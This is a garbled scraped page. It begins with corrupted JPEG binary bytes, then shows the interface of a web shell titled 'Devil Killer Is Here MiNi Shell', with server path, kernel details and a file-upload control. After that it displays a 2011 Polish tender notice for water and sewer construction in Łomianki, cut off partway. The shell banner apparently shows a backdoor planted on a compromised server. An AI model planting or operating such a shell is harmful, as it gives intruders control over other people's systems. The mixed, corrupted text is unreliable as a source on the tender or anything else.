JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111019/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111019/343084-N-2011.html

<p class="kh_header"><b>Łomianki: Przedmiotem zamówienia jest :Budowa sieci wodociągowej i kanalizacyjnej w ulicy Baonu Zośka w Łomiankach.OZNACZENIE POSTĘPOWANIA: ZP/PNB/ZS/ZWIK/69/10/2011</b><br>
<b>Numer ogłoszenia: 343084 - 2011; data zamieszczenia: 19.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Wodociągów i Kanalizacji w Łomiankach sp. z o.o. , ul. Rolnicza 244, 05-092 Łomianki, woj. mazowieckie, tel. 22 7513504, faks 22 7517035.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zwik.lomianki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zamawiający Sektorowy-Sektor Wodno-Kanalizycyjny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest :Budowa sieci wodociągowej i kanalizacyjnej w ulicy Baonu Zośka w Łomiankach.OZNACZENIE POSTĘPOWANIA: ZP/PNB/ZS/ZWIK/69/10/2011.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy zakres przedmiotu zamówienia określają: Załącznik nr 9 do SIWZ - Przedmiar robót budowlanych Załącznik nr 11 do SIWZ -  Projekt budowlano - wykonawczy sieci wodno - kanalizacyjnej z przyłączami i przykanalikami w ulicy Baonu Zośka w Łomiankach; Roboty budowlane muszą być wykonane zgodnie z treścią Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych (załącznik nr 10 do SIWZ). Ponadto wykonawca ma w obowiązku we własnym zakresie wykonać i zatwierdzić w odpowiednich instytucjach dokumentację dotyczącą czasowej organizacji ruchu na czas budowy. Kosztorys ofertowy musi być sporządzony zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie  określania metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130, poz. 1389). UWAGA!!! Wykonawca sam szacuje liczbę godzin i kwotę za pompowanie wody przy odwodnieniu wykopów oraz koszty robót związanych z zabezpieczeniem wykopów i ryczałtowy koszt uwzględnia w swojej ofercie. Liczba godzin pompowania wody z wykopów zawarta w przedmiarze robót ma charakter jedynie orientacyjny. Zamawiający zastrzega sobie możliwość rezygnacji z zakresu części robót i wykonywania robót zamiennych nie wykraczających poza zakres przedmiotu zamówienia. Roboty zamienne (rozwiązania zamienne), o których mowa powyżej, w stosunku do przewidzianych w dokumentacji projektowej, będą możliwe, jeżeli ich realizacja: nie wykracza poza określony zakres przedmiotu zamówienia i nie wpłynie na zwiększenie wartości wynagrodzenia umownego, a roboty nie będą robotami dodatkowymi w rozumieniu przepisów ustawy prawo zamówień publicznych,powstanie w wyniku zmiany sposobu wykonania elementu robót, nie zwiększając parametrów zamówienia i nie wykraczając poza ilość materiałów określonych w dokumentacji projektowej, powstanie w wyniku konieczności zastosowania zamiennego równoważnego materiału spełniającego parametry i warunki określone w dokumentacji projektowej (np. z powodu wycofania z produkcji zatwierdzonego w dokumentacji projektowej materiału),
wpłynie na ulepszenie realizowanego zamówienia i usprawnienie procesu realizacji budowy oraz zapobiegnie powstaniu dużych i nieodwracalnych w skutkach strat dla Zamawiającego. Zastosowane materiały - powinny posiadać certyfikaty zezwalające na stosowanie w budownictwie. Zgodnie z art. 10 Ustawy Prawo budowlane Wykonawca przedstawi powyższe certyfikaty oraz dołączy do dokumentacji powykonawczej, którą sporządzi. Warunki obmiaru, wykonania i odbioru robót - zgodnie z wymogami Ustawy Prawo budowlane, Polskimi Normami i opisem technologicznym przedstawionym w kodach pozycji przedmiaru, zgodnie z KNR-ami. Zamawiający zgodnie z art. 29, 30 ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych (tj. Dz. U. z 2010 r., Nr 113, poz. 759 z późniejszymi zamianami) dopuszcza zastosowanie materiałów i urządzeń równoważnych do przedstawionych poniżej (o parametrach równoważnych lub wyższych) i opisanych w przedmiarach robót. Użyte w dokumentacji projektowej i przedmiarach znaki towarowe i nazwy są przykładowe. W przypadku materiałów i urządzeń równoważnych muszą to być materiały i urządzenia dopuszczone do użytku na terenie Polski i uzgodnione z Zamawiającym przed zastosowaniem lub/i zamontowaniem. Jeżeli Wykonawca powołuje się na rozwiązania równoważne opisywanym przez zamawiającego, to zgodnie z art. 30 ust. 5 ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych (tj. Dz. U. z 2010r., Nr 113, poz. 759 z późniejszymi zamianami) jest obowiązany wykazać, że oferowane przez niego dostawy, usług lub roboty budowlane spełniają wymagania określone przez zamawiającego. SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA: Budowa sieci wodociągowej i kanalizacyjnej w ulicy Baonu Zośka w Łomiankach. Przedmiotem zamówienia jest wykonanie prac budowlanych polegających na: Budowie sieci wodociągowej wraz z armaturą w ww. ulicy oraz włączenie wybudowanej instalacji do miejskiej infrastruktury wodociągowej w ul. Warszawskiej w Łomiankach.
Budowie sieci kanalizacji grawitacyjnej i tłocznej wraz z budową i uzbrojeniem urządzeń zbiornikowo-tłocznych w w/w ulicy oraz włączenie wybudowanych kolektorów ściekowych do miejskiej infrastruktury kanalizacyjnej w ul. Warszawskiej w Łomiankach. odbudowanie nawierzchni dróg po przeprowadzonych pracach wodociągowo-kanalizacyjnych do stanu pierwotnego w zakresie niezbędnym, zapewniającym ich przejezdność zgodnie z warunkami zawartymi w stosownych pozwoleniach na zajęcie pasa drogowego odpowiednich ulic.
SZCZEGÓŁOWY ZAKRES INWESTYCJI: Zadanie polegające na budowie sieci wodociągowej i kanalizacyjnej, których wykonanie scharakteryzowano poniżej.
Budowa sieci wodociągowo - kanalizacyjnej w ulicy Baonu Zośka na odcinku 
od ulicy Warszawskiej do wysokości działki ewidencyjnej nr 358, obręb 0003 
w Łomiankach, polegająca na:Budowie sieci wodociągowej w ulicy Baonu Zośka - od istniejącego odcinka wodociągu w ul. Warszawskiej do działki o numerze ewidencyjnym 358, obręb 0003 w Łomiankach, wraz z włączeniem wybudowanego przewodu do sieci istniejącej w ulicy Warszawskiej:
a)długość przewodu: 474 mb, b)rury Dz 160 mm PE 100 SDR 17 PN 10, 
c)uzbrojenie z żeliwa sferoidalnego np. typu HAWLE, np. typu AVK lub równoważne,
d)ilość przyłączy do granicy posesji: 40 szt., rury Dz 40 mm PE 100 SDR 11,
UWAGA!!! Hydrant podziemny HP5.8.01 na końcu sieci umieścić za ostatnimi przyłączami WP93 i WP92 w celu ułatwienia późniejszego płukania całości sieci.
Budowie sieci kanalizacji grawitacyjnej w ulicy Baonu Zośka - od projektowanej studni S5.10.1.01 do projektowanej studni S5.10.2.01 oraz od projektowanej studni S5.11.1.01 do projektowanej przepompowni ścieków U5.8.1 wraz z włączeniem wybudowanego kolektora poprzez w/w przepompownię ścieków i sieć kanalizacji tłocznej do sieci istniejącej w ulicy Warszawskiej:a)długość kolektora grawitacyjnego: 419 mb,b)	rury PP o podwójnej ściance SN8 Dn 200, np. typu PP - b Pragma, lub równoważne,c)ilość przykanalików do granicy posesji: 38 szt., rury Dn 160 mm PVC S lite SN8. Budowie sieci kanalizacji tłocznej w ulicy Baonu Zośka - od projektowanej przepompowni ścieków U5.8 do projektowanej studni betonowej S5.11.1.01 oraz od projektowanej przepompowni ścieków U5.8.1 do istniejącej sieci kanalizacji tłocznej (węzeł T5.8.5 w okolicach skrzyżowania z ulicą Warszawską):
a)długość przewody kanalizacji tłocznej: 79 mb,b)rury Dz 110 mm PE 100 SDR 17 PN 10, Budowie 2 przepompowni ścieków - U 5.8 i U 5.8.1 w ulicy Baonu Zośka:
a)średnica przepompowni - 1500 mm,b)uzbrojenie - 2 pompy zatapialne z wirnikiem typu N o wolnym przelocie i parametrach: 1) U 5.8 - wysokość podnoszenia H = 6,8 m, wydajność Q = 6 l na s; 2) U 5.8.1 - wysokość podnoszenia H = 10,0 m, wydajność Q = 7 l na s. Na dopływie do przepompowni należy zamontować zasuwę odcinającą nożową z żeliwa sferoidalnego PN16. c)Przepompownię ścieków należy wykonać jako zbiornik podziemny, monolityczny z polimerobetonu z włazem na zawiasach z żeliwa sferoidalnego O 800 mm i wytrzymałości 40 ton.
UWAGA!!! Studzienki rewizyjne S5.10.2.01B oraz S5.10.1.06B zaprojektowane jako studnie z tworzywa O 425 mm należy wykonać jako studnie betonowe O 1200 mm i zainstalować w nich zasuwy nożowe, odcinające dopływ ścieków do przepompowni U5.8. Ponadto zasuwę nożową odcinającą dopływ ścieków do przepompowni U5.8.1 należy zamontować w poprzedzającej ją studni betonowej S5.11.1.05. 
WARUNKI SZCZEGÓLNE:SIEĆ WODOCIĄGOWA: Zaprojektowaną sieć wodociągową należy wykonać z rur Dz 160 mm PE100 SDR17 PN10. Zaprojektowany odcinek sieci należy włączyć do istniejącego odcinka sieci wodociągowej Dz 160 mm w ulicy Warszawskiej.Zaprojektowane przewody leżą na głębokości od 1,48 do 2,03 m i ułożone są z maksymalnym spadkiem 8,1%. Odpowietrzenie i odwodnienie rurociągu będzie możliwe poprzez zamontowanie na sieci hydrantów, które zostały rozmieszczone zgodnie z normą PN-B-02863 Przeciwpożarowe zaopatrzenie wodne. Dobrano hydranty podziemne z dodatkowym zamknięciem Dn 80 PN 16 o wydajności 10 l na s. Po każdorazowym zamknięciu hydrantu powinno nastąpić samoczynne opróżnienie kolumny z wody, co zapewni jego odporność na przemarzanie. Skrzynki hydrantowe typu ciężkiego należy podbetonować i obsadzić na rurze O 160 PVC. W skład uzbrojenia przewodów wchodzą zasuwy odcinające oraz trójniki. Dobrano zasuwy kołnierzowe DN 150 PN 16 o trzpieniach teleskopowych oraz zasuwy z obustronnym złączem do rur PE DN 32 PN 16. Skrzynki zasuw typu ciężkiego należy podbetonować. Włączenia odcinków sieci o średnicy Dz 40 mm do odcinków Dz 160 mm wykonać za pomocą trójników siodłowych samonawiercających PE 100 PN 16 Dz 160-40 mm lub 160-50 mm oraz redukcje 50/40mm. PRZYŁĄCZA WODOCIĄGOWE:W projekcie przewidziano przyłącza wodociągowe o średnicy Dz 40 mm z rur PE 100 SDR 11 na ciśnienie nominalne 16 bar. Przyłącza powinny być doprowadzone do wszystkich posesji i zakończone zaślepką. Dodatkowo na każdym przyłączu przewidziano zasuwy z obustronnym złączem do rur PE DN 32 PN 16 z pierścieniem zaciskowym
SIEĆ KANALIZACYJNA: Ścieki z posesji zlokalizowanych przy ulicy Baonu Zośka transportowane będą do istniejącej sieci kanalizacji tłocznej w ulicy Warszawskiej o średnicy Dz 250 mm, poprzez istniejące zejście kanalizacji tłocznej, za pomocą sytemu grawitacyjno - tłocznego zaprojektowanego w ulicy Baonu Zośka. Dalej ścieki transportowane będą do oczyszczalni ścieków przy ulicy Brukowej.
KANAŁY ŚCIEKOWE:Sieć kanalizacji sanitarnej zaprojektowano w systemie grawitacyjno - tłocznym z rur PP o podwójnej ściance SN8 Dn 200 np. typu PP - b Pragma (lub równoważne), łączonych na kielichy z uszczelkami oraz tłocznym z rur PE100 SDR17 PN10 o średnicy Dz 110 mm. Spadki kanałów grawitacyjnych w zależności od ukształtowania terenu wynoszą od 0,5 do 2,2 %, a zagłębienia od 1,64 m p. p. t. do 3,53 m p. p. t. Przewód tłoczny leży na głębokości 1,35 m p. p. t. - 1,61 m p. p. t., a jego spadek wynosi od 0,9 % - 1,6 %.
W skład uzbrojenia przewodów tłocznych wchodzi armatura napowietrzająco - odpowietrzająca oraz zasuwy odcinające. Zaprojektowano również zasuwę 
nożową do ścieków, odcinającą z całkowicie wolnym przelotem 
z żeliwa sferoidalnego Dn 200 PN 16 do bezpośredniej zabudowy w studni.
STUDZIENKI KANALIZACYJNE: Należy wykonać 13 studni kanalizacyjnych O 1200 mm z kręgów betonowych oraz 9 studzienek O 425 mm z tworzyw sztucznych dopasowanych do rur kanalizacyjnych. Włazy kanalizacyjne typu ciężkiego na zatrzask (40T) ryglowane na studniach O 1200 mm. Włazy należy montować tak, aby znajdowały się w środku pasa jezdni. Studzienki O 425 mm należy zwieńczyć włazem typu ciężkiego na zatrzask (40T) wraz z pierścieniem odciążającym
PRZYKANLIKI: Włączenia do posesji zaprojektowano poprzez studzienki kanalizacyjne oraz trójniki. Przykanaliki doprowadzone zostaną do granicy posesji i zakończone zaślepką. Projektowane przykanaliki należy wykonać z rur o średnicy Dn 160 mm PVC lite SN8 S. Ustalono spadek przykanalików - 1,7 %.  
POMPOWNIA ŚCIEKÓW (URZĄDZENIE ZBIORNIKOWO-TŁOCZNE) Przepompownie ścieków U5.8 i U5.8.1 przewidziane zostały jako zbiorniki monolityczne wykonane z polimerobetonu o średnicy zewnętrznej 1500 mm, z włazem na zawiasie z zatrzaskiem o średnicy 800 mm i wytrzymałością 40 t. Zbiornik pompowni wyposażyć należy w stopnie złazowe ze stali kwasoodpornej. Zbiornik przepompowni wentylowany będzie przy pomocy rur wywiewnych z kominkiem PVC 110-160 zamontowanych w pokrywie betonowej i wyniesionych ponad poziom terenu. Doprowadzenie kabli elektrycznych do pomp w rurze osłonowej PVC 160 zamontowanej w ściance zbiornika przepompowni. UWAGA!!! Szafa sterownicza powinna być przystosowana do monitoringu w systemie GPRS funkcjonującego w obiektach zarządzanych przez ZWiK w Łomiankach Sp. z o. o. WYMAGANIA TECHNICZNE: Wymagania techniczne dotyczące prac związanych z budową sieci wodociągowej i kanalizacyjnej wraz z niezbędną infrastrukturą są zgodne z:
PN-68 B-06050 Roboty ziemne budowlane. Wymagania w zakresie 	wykonywania i odbioru;BN-83 8836-02 Przewody podziemne. Roboty ziemne. Wymagania i badania przy odbiorze; BN-77 893 1 1-12 Oznaczanie wskaźnika zagęszczenia gruntu; PN-75 B-04481 Grunty budowlane. Badania próbek gruntu. PN-63B-06251 Roboty betonowe i żelbetowe; Wymagania techniczne. PN-92 B-10735 Kanalizacja. Przewody kanalizacyjne. Wymagania i 	badania przy odbiorze. PN-02 B-10729 Kanalizacja. Studzienki kanalizacyjne. PN-75 B-04481 Grunty budowlane. Badania laboratoryjne. PN-65 B-06250 Beton zwykły. PN-B-10725 Wodociągi. Przewody zewnętrzne. Wymagania i badania przy odbiorze. PN-EN 12050-1:2002 pompownie ścieków, wymagania normy. PN-EN 12050-4:2002 armatury przepompowni (zawory zwrotne) wymagania normy. BN-77 8931-12 Oznaczanie wskaźnika zagęszczenia gruntu. EN 13244:1998 System orurowania z tworzyw sztucznych do pod- i nadziemnych ciśnieniowych systemów do wody ogólnego zastosowania, do odwadniania i odprowadzania ścieków. Polietylen (PE). Wykonawca zobowiązany będzie wyznaczyć osobę nadzorującą swoich pracowników do stałego kontaktu z Zamawiającym i zapewni łączność telefoniczną z tą osobą na własny koszt. 
Do obowiązków ww. osoby należeć będzie m.in.: czuwanie nad prawidłową realizacją przedmiotu umowy;codzienny nadzór nad pracą personelu wykonującego przedmiot zamówienia. Wypłata wynagrodzenia za przedmiot zamówienia odbywać się będzie etapami, nie częściej, niż raz w miesiącu. Wykonawca otrzyma wynagrodzenie za roboty etapowe zatwierdzone wcześniej przez Zamawiającego, po zakończeniu wszystkich robót w danym etapie, po komisyjnym ich odbiorze oraz na podstawie sprawdzonego kosztorysu powykonawczego-zamiennego, etapowego.
Przedstawiona w ofercie cena za wykonanie przedmiotu zamówienia będzie ceną, która nie może ulec zwiększeniu w rozliczeniu na podstawie kosztorysu powykonawczego - zamiennego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.11.12.00-0, 45.11.12.40-0, 45.23.13.00-8, 45.23.24.10-9, 45.23.24.23-3, 45.31.00.00-3, 45.23.32.20-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wpłacenia wadium w kwocie 20 000,00 zł (słownie: dwadzieścia tysięcy złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie ww. warunku, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunku udziału w postępowaniu z art. 22 ust. 1 pkt 1-4 ustawy Prawo zamówień publicznych (Dz. U. z 2010r., Nr 113, poz. 759 z póź. zm.) - zgodnie z Załącznikiem nr 2 do SIWZ oraz dokumenty, o których mowa w ppkt. 6.1.7. i w ppkt. 6.1.8. SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie ww. warunku, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunku udziału w postępowaniu z art. 22 ust. 1 pkt 1-4 ustawy Prawo zamówień publicznych (Dz. U. z 2010r., Nr 113, poz. 759 z póź. zm.) - zgodnie z Załącznikiem nr 2 do SIWZ oraz dokumenty, o których mowa w ppkt. 6.1.7. i w ppkt. 6.1.8. SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie ww. warunku, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunku udziału w postępowaniu z art. 22 ust. 1 pkt 1-4 ustawy Prawo zamówień publicznych (Dz. U. z 2010r., Nr 113, poz. 759 z póź. zm.) - zgodnie z Załącznikiem nr 2 do SIWZ oraz dokumenty, o których mowa w ppkt. 6.1.7. i w ppkt. 6.1.8. SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie ww. warunku, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunku udziału w postępowaniu z art. 22 ust. 1 pkt 1-4 ustawy Prawo zamówień publicznych (Dz. U. z 2010r., Nr 113, poz. 759 z póź. zm.) - zgodnie z Załącznikiem nr 2 do SIWZ oraz dokumenty, o których mowa w ppkt. 6.1.7. i w ppkt. 6.1.8. SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie ww. warunku, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunku udziału w postępowaniu z art. 22 ust. 1 pkt 1-4 ustawy Prawo zamówień publicznych (Dz. U. z 2010r., Nr 113, poz. 759 z póź. zm.) - zgodnie z Załącznikiem nr 2 do SIWZ oraz dokumenty, o których mowa w ppkt. 6.1.7. i w ppkt. 6.1.8. SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

